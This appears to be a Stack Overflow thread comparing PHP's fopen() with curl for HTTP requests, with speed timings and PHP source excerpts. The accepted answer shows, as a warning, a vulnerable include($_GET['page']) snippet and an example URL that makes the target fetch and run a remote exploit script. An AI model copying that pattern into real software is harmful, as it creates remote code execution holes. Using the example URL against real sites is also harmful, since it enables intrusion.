# What are the important differences between using fopen($url) and curl in PHP?

Tags: php, web-services, http, curl

I'm writing some code that will need to speak to a web service over HTTP(s).  In the past I've used the curl library.  Recently, I noticed that I can simply use fopen() to access a remote URL and it seems far simpler.

Curl seems to be much more configurable, having a plethora of options.  Beyond that configurability, does it matter which method is used?  If so, which is better and why?

Answer (score 14, accepted):

`fopen()` will only open remote URLs if `allow_fopen_url` is enabled in `php.ini`.

However in versions prior to 5.2.0, this was exceedingly dangerous because the `include` function would also download **and parse** PHP code from remote sites.  A naive coder could easily be caught out with code like:

```
<?php
    $page = $_GET['page'];
    include($page);
?>
```

at which point an attacker just has to ask for `http://example.com/script.php?page=http://example.net/my_exploit_script` to execute their own code on the system and introduce an exploit.  Unfortunately the default value for `allow_fopen_url` is 'on'.

Fortunately, since 5.2.0 there's a separate setting (which *should* default to 'off') called `allow_url_include` which prevents `include` from downloading remote code.

Personally, if you've got the option to use Curl, use that rather than `fopen`.

Answer (score 15):

As Alnitak said, using CURL does not depend on the PHP settings.
I've done some speed tests

```
file_get_contents
```

with my

```
function file_get_contents_curl($url) {
    $ch = curl_init();

    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_URL, $url);

    $data = curl_exec($ch);
    curl_close($ch);

    return $data;
}
```

Result:

```
0.263456821442
0.0626730918884
```

CURL is 4 times faster :)

Comment: Just what I was looking for. +1

Answer (score 5):

side note: PHP can be configured to use curl for the http url_wrapper instead of using "its own" implementation.

ext/curl/interface.c:

```
#ifdef PHP_CURL_URL_WRAPPERS
# if HAVE_CURL_VERSION_INFO
    {
        curl_version_info_data *info = curl_version_info(CURLVERSION_NOW);
        char **p = (char **)info->protocols;

        while (*p != NULL) {
            php_register_url_stream_wrapper(*p++, &php_curl_wrapper TSRMLS_CC);
        }
    }
# else
    php_register_url_stream_wrapper("http", &php_curl_wrapper TSRMLS_CC);
    php_register_url_stream_wrapper("https", &php_curl_wrapper TSRMLS_CC);
    php_register_url_stream_wrapper("ftp", &php_curl_wrapper TSRMLS_CC);
    php_register_url_stream_wrapper("ldap", &php_curl_wrapper TSRMLS_CC);
# endif
#endif
```